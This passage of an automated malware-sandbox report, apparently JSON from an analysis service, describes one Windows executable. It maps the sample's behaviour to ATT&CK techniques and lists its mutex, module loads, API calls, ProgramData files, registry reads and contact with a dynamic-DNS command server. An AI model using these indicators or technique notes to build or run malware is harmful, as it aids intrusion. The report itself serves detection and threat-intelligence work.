{"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Domain Generation Algorithms", "attck_id": "T1568.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568/002", "informative_identifiers_count": 1, "parent": {"technique": "Dynamic Resolution", "attck_id": "T1568", "attck_id_wiki": "https://attack.mitre.org/techniques/T1568"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\jndggbdhsgsddsaceee-O5S4SA\"\n \"jndggbdhsgsddsaceee-O5S4SA\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" file has an entrypoint instructions - \"call\t0x43528d,jmp\t0x434be8,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\tebx,push\t0x17,call\t0x4570c9,test\teax, eax,je\t0x434d88,mov\tecx, dword ptr [ebp + 8],int\t0x29,push\t3,call\t0x434f4e,mov\tdword ptr [esp], 0x2cc,lea\teax, [ebp - 0x324],push\t0,push\teax,call\t0x437280,add\tesp, 0xc,mov\tdword ptr [ebp - 0x274], eax,mov\tdword ptr [ebp - 0x278], ecx,mov\tdword ptr [ebp - 0x27c], edx,mov\tdword ptr [ebp - 0x280], ebx,mov\tdword ptr [ebp - 0x284], esi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71760000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"KERNEL32\" at base 77620000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6bb50000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"KERNEL32.DLL\" at base 77620000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 75e50000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74fd0000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74b30000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74fc0000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"DNSAPI.DLL\" at base 74e90000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"IPHLPAPI.DLL\" at base 73960000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"RPCRT4.DLL\" at base 76fe0000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"RASADHLP.DLL\" at base 6e150000\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73810000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter getaddrinfo (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter getnameinfo (UID: 00000000-00005976)\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844bef6b@Iphlpapi.DLL\"\n \"0f001000dc4bef6b@Iphlpapi.DLL\"\n \"0c000d00244cef6b@Iphlpapi.DLL\"\n \"140015006c4cef6b@Iphlpapi.DLL\"\n \"0c000d00e04cef6b@Iphlpapi.DLL\"\n \"15001600c03eef6b@ADVAPI32.dll\"\n \"0e000f00703fef6b@ADVAPI32.dll\"\n \"0e000f00cc3fef6b@ADVAPI32.dll\"\n \"11001200b447ef6b@ADVAPI32.dll\"\n \"110012004848ef6b@ADVAPI32.dll\"\n \"120013008c48ef6b@ADVAPI32.dll\"\n \"12001300e448ef6b@ADVAPI32.dll\"\n \"14001500f86eef6b@ADVAPI32.dll\"\n \"14001500106fef6b@ADVAPI32.dll\"\n \"14001500286fef6b@ADVAPI32.dll\"\n \"17001800406fef6b@ADVAPI32.dll\"\n \"0d000e00586fef6b@ADVAPI32.dll\"\n \"11001200686fef6b@ADVAPI32.dll\"\n \"110012007c6fef6b@ADVAPI32.dll\"\n \"0d000e004466ef6b@WININET.dll\"\n \"0d000e00b466ef6b@WININET.dll\"\n \"10001100ec66ef6b@WININET.dll\"\n \"100011009067ef6b@WININET.dll\"\n \"10001100c06fef6b@WININET.dll\"\n \"10001100d46fef6b@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" called \"CreateDirectoryW\" with parameter %ALLUSERSPROFILE%\\furas (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76FE0000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:30204\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"computador12.ddns-ip.net\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\WINMM.dll\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\Windows\\system\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\Windows\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\ProgramData\\Oracle\\Java\\javapath\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\Wbem\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\shcore.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\Iphlpapi.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\WINNSI.DLL\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\SspiCli.dll\"\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" writes a file \"C:\\ProgramData\\furas\\registros.dat\"", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"dd3706144ba3f88dd1606e7d06e6b0ecc4b848108a5eb6c5612b8912da3bc6c2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; 